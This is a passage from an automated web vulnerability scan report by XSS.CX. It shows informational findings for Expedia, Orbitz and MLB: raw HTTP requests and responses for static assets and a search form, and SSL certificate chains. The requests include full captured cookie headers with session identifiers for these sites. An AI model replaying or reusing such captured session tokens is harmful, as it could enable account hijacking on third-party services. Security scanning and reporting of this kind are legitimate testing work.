Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1053-1317085585102"
Last-Modified: Tue, 27 Sep 2011 01:06:25 GMT
Content-Length: 1053
Date: Mon, 03 Oct 2011 01:02:51 GMT
Connection: keep-alive

GIF89a@............4Mjbt................w..................6X...........................................................................................................................................
...[SNIP]...
29.34. https://www.expedia.com/static/default/default/stubs/adserver.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317085587388"
Last-Modified: Tue, 27 Sep 2011 01:06:27 GMT
Content-Length: 51
Date: Mon, 03 Oct 2011 01:08:47 GMT
Connection: keep-alive

{ url: 'http://www.tripadvisor.com/HotelLander' }
29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"883-1317080325986"
Last-Modified: Mon, 26 Sep 2011 23:38:45 GMT
Content-Length: 883
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

.PNG
.
...IHDR... ...S.....P.......sRGB.........PLTE.....i.......2X.5].....f..9.....1.-O.....m.7J.........F...3Y.......5\.......0T..P.4Z.4\.7O.......7N.8R.....Q..3..9..=..Y...........b.4[....8O....8
...[SNIP]...
29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBGtransparent.png

Request

GET /static/fusion/v2.3/images/buttonBGtransparent.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1383-1317080326049"
Last-Modified: Mon, 26 Sep 2011 23:38:46 GMT
Content-Length: 1383
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

.PNG
.
...IHDR... ...S.....g.c.....sRGB.........bKGD.............    pHYs.................tIME....
...J......IDATx...M..w....3/.6.X.R..P..=.R..E/....#
...............R<ZO.G..
m...).H.C.......3.:;..C.
...[SNIP]...
29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"4221-1317085593846"
Last-Modified: Tue, 27 Sep 2011 01:06:33 GMT
Content-Length: 4221
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

.PNG
.
...IHDR.............7.c2....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...
29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"6824-1317085625511"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 6824
Date: Mon, 03 Oct 2011 01:02:54 GMT
Connection: keep-alive

.PNG
.
...IHDR...i..........pi.....sRGB.........bKGD.............    pHYs.................tIME..... 0.......(IDATx..]k..Wu.zfvg.Z...^..^.e..%tG.%9.....G..    ........q...!...
.r......"......d.p$.b.....,y%
...[SNIP]...
29.39. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
</title>
   
    <meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" />
   <style type="text/css">
...[SNIP]...
30. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

30.1. https://secure.mlb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.mlb.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Dec 14 18:00:00 CST 2010
Valid to:  Fri Dec 21 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
30.2. https://www.expedia.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.expedia.com,ST=WASHINGTON
Issued by:  Akamai Subordinate CA 3
Valid from:  Sun Apr 10 17:54:27 CDT 2011
Valid to:  Tue Apr 10 17:54:27 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
Report generated by XSS.CX at Sun Oct 02 21:15:06 CDT 2011.